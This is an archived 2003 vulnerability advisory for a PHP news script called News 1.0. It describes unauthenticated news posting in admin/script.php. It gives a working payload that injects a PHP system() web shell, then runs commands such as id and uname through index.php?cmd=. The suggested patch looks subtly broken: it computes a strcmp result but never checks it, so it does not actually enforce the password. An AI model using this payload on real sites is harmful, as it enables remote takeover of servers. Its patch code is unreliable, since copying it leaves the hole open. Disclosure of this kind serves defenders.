Product: News Version: 1.0 OffSite: http://xonix.ru Problem: Add news -------------------------------------- You may add news without autorization. http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS. example: http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?> then open http://[target]/index.php?cmd=id;uname -a; etc... Patch. Add in index.php : <input type=hidden name=pass value=<?=$pass?>> Before </form> And add in script.php after include("config.php"); if (!isset($pass)) exit; $q=strcmp($pass,$password); greetz: GipsHack, DHGroup, subj, Lobst, and all, who know me Contacts: www.overg.com www.dwcgr0up.com irc.zaingandol.org #DWC ogprogat_private Best regards, Over G[DWC Gr0up]
This archive was generated by hypermail 2b30 : Mon Mar 31 2003 - 15:56:46 PST